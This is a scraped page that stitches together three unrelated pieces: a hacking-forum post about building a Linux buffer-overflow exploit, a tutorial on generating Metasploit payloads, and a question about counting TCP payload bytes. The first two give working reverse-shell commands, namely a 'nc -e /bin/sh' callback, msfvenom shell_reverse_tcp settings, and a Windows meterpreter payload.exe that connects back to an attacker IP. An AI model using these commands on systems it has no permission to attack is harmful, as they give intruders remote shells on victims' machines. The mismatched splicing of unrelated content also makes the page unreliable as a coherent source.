Tcp payload on linux
Welcome! HowToHack is a Zempirian community designed to help those on their journey from neophyte to veteran in the world of underground skillsets. Ask, Answer, Learn. Feel free to practice hands on with available Zempirian labs and resources. Begin training below https://training.zempirians.com -or- visiting us at https://discord.gg/ep2uKUG
Hi, I’ve been working on this problem for a while, and some advice would be appreciated.
Scenario: I’m trying to make create a linux linux reverse bind shell through a netcat connection to a specific IP and port number. The payload would be transmitted as text along with a NOP sled and overwritten return addresses, which will generate a buffer overflow in the target machine and execute «nc -e /bin/sh ipaddr port#» command, which would spawn a shell on my side.
While I’ve gotten a good idea of how much space I have for the payload and what offsets the return addresses should be stored, I’m hopelessly lost on how to make the payload itself.
First I tried this site , which gave me a nice hex format shellcode. But when I went to test it on my local machine as a final step by having a terminal with nc running and executing the payload, it failed to generate a connection.
So next I tried using msfvenom to create a payload. I tried using a linux/shell_reverse_tcp payload with these settings to create a payload:
msfvenom -a x86 —platform linux -p linux/x86/shell_reverse_tcp -b ‘\x00’ -f sh LHOST=127.127.127.127 LPORT=4444
But when I went to test that on my local machine, it also didn’t work.
I was hoping if someone could tell me if I was doing something wrong with using msfvenom, or if there are other better payload generating methods.
Update: I ended up using the asm code that was in the first site that I linked above. By fiddling around with the offsets after changing the IP and port number I was able to generate reverse shells through a netcat connection by using the resulting shellcode — the first time around I must have made several mistakes with offsets.
Thanks to u/SirBaronBomboozie, u/CommoG33k and u/Sionion for helping me out with this problem!
How to Create Payload with Metasploit
Metasploit is one of the most widely used platforms for conducting penetration tests, hacking, and even informal gaming. We need to comprehend how the components and payloads function to use them effectively. In simplistic terms, a payload is an action that must be executed when an exploit has completed its execution. A payload is a part of code that the exploit executes. Exploits are used to gain access to a system, and payloads carry out specific tasks. Metasploit has many payloads, such as reverse shells, bind shells, Meterpreter, and others. Several payloads will work with the most exploits; however, finding the proper payload that will function with the exploit requires some investigation. Once you have decided on an exploit, use Metasploit’s “display payloads” command to get a list of payloads that will work with it.
Types of payloads
In Metasploit, there are a few different sorts of payloads. These three basic types are the ones you will eventually wind up using the most:
Singles
Singles are extremely small and intended to initiate a conversation before moving on to another stage.
Stagers
The payload uses the stager to establish a network connection between the target system and the Metasploit server’s payload processor. The stager allows you to load and insert a larger, more complicated payload termed the stage using a smaller payload.
Meterpreter
Meterpreter has become a Metasploit attack payload that gives an intruder factor that affects how to browse and execute code on the target machine. Meterpreter is a memory-only application that does not write to disc. Meterpreter tried to inject itself on the attacked process, from where it can move to other operating processes; therefore, no new processes are generated. Meterpreter was created to avoid the disadvantages of using specialized payloads while allowing command writing and assuring encrypted communication. The downside of employing specific payloads is that alarms may be raised if a newer process starts throughout the target system.
Creating payload with Metasploit in Kali Linux
To create payload with Metasploit in Kali Linux, follow all the steps described below:
Step 1: Accessing Msfconsole
msfconsole is the only means to access the majority of Metasploit’s functionality. msfconsole gives the platform a console-based interface. msfconsole has been the MSF interface with the greatest features and is the most stable. Full readline capability, tabbing, and command completion are all provided by Msfconsole. External commands can be run from the msfconsole. Use the following stated command to access msfconsole on Kali Linux.
Step 2: Accessing msfvenom
The payload we make using msfvenom will be a Reverse TCP payload. This payload creates an executable that, when started, establishes a connection between the user’s computer and our Metasploit handler, allowing us to conduct a meterpreter session. Use the following stated command to access msfvenom on Kali Linux.
Step 3: Creating payload
Use the following stated command to create a payload in Metasploit on Kali Linux.
$ msfvenom -p windows / meterpreter / reverse_tcp lhost =192.168.43.28 lport = 6001 -f exe –o payload.exe
You can use the -p option to indicate which payload you want to utilize. Lhost seems to be the attacker’s IP address to which you want the payload to link. Lport is just the same as above; this is the port that the payload will link to, and it must be configured in the handler. -f instructs Msfvenom how to generate the payload; in this case, we’re going for a program executable or exe. The payload created by the above command’s execution is 73802 bytes, as shown from the above-attached image.
To verify where it has been created, we will navigate towards the home directory. From the below-attached screenshot, you can verify that payload.exe has been created successfully.
You can check its properties by double-clicking on it. The size of the created payload is the same as it was shown on the terminal screen.
Conclusion
This article has provided a brief introduction related to payloads and their types. We have followed step-by-step instructions to create payloads in Metasploit in the Kali Linux operating system.
Determine TCP payload activity/statistics
I’d like to lookup a counter of the TCP payload activity (total bytes received) either for a given file descriptor or a given interface. Preferably the given file descriptor, but for the interface would be sufficient. Ideally I’d really like to know about any bytes that have been ack-ed, even ones which I have not read into userspace (yet?). I’ve seen the TCP_INFO feature of getsockopt() but none of the fields appear to store «Total bytes received» or «total bytes transmitted (acked, e.g.)» so far as I can tell. I’ve also seen the netlink IFLA_STATS + RTNL_TC_BYTES and the SIOCETHTOOL + ETHTOOL_GSTATS ioctl() ( rx_bytes field) for the interfaces, and those are great, but I don’t think they’ll be able to discriminate between the overhead/headers of the other layers and the actual payload bytes. procfs has /proc/net/tcp but this doesn’t seem to contain what I’m looking for either. Is there any way to get this particular data? EDIT: promiscuous mode has an unbearable impact on throughput, so I can’t leverage anything that uses it. Not to mention that implementing large parts of the IP stack to determine which packets are appropriate is beyond my intended scope for this solution. The goal is to have an overarching/no-trust/second-guess of what values I store from recvmsg(). The Right Thing™ to do is to keep track of those values correctly, but it would be valuable to have a simple «Hey OS? How many bytes have I really received on this socket?»
Can you use libpcap? You can set a monitor interface and capture exactly the types of packet you want, then just increment a counter if those packets meet your criteria.